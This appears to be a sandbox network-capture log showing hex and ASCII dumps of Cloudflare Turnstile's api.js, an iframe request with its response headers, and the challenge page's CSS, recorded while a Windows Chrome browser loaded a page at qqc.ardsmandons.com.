                                                                                                                          2024-11-25 15:42:32 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                          Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                                          2024-11-25 15:42:32 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                          Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                                          2024-11-25 15:42:32 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                                                          Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                                                          2024-11-25 15:42:32 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                                                          Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                                                          2024-11-25 15:42:32 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                                                          Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                                                          2024-11-25 15:42:32 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                                                                                          Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                                                                                          2024-11-25 15:42:32 UTC1369INData Raw: 61 76 30 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42
                                                                                                                          Data Ascii: av0/rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUB
                                                                                                                          2024-11-25 15:42:32 UTC1369INData Raw: 63 74 7c 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72
                                                                                                                          Data Ascii: ct||Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var
                                                                                                                          2024-11-25 15:42:32 UTC1369INData Raw: 73 2c 6e 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28
                                                                                                                          Data Ascii: s,n);var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(
                                                                                                                          2024-11-25 15:42:32 UTC1369INData Raw: 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74
                                                                                                                          Data Ascii: cument.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.st


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          10192.168.2.449752104.18.94.414434944C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:42:32 UTC802OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qgqz3/0x4AAAAAAAz5HcczQ_Y58zGl/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: iframe
                                                                                                                          Referer: https://qqc.ardsmandons.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-11-25 15:42:32 UTC1362INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:42:32 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 26459
                                                                                                                          Connection: close
                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                          permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                          content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                                          cross-origin-embedder-policy: require-corp
                                                                                                                          cross-origin-opener-policy: same-origin
                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                          origin-agent-cluster: ?1
                                                                                                                          accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                          critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                          referrer-policy: same-origin
                                                                                                                          document-policy: js-profiling
                                                                                                                          2024-11-25 15:42:32 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 65 38 32 62 66 63 66 31 61 62 39 34 33 36 33 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: Server: cloudflareCF-RAY: 8e82bfcf1ab94363-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                          2024-11-25 15:42:32 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                          Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                          2024-11-25 15:42:32 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                                                          Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                                                          2024-11-25 15:42:32 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                                                          Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                                                          2024-11-25 15:42:32 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                                                                          Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                                                                          2024-11-25 15:42:33 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                                                          Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                                                                          2024-11-25 15:42:33 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                                                                          Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                                                                          2024-11-25 15:42:33 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
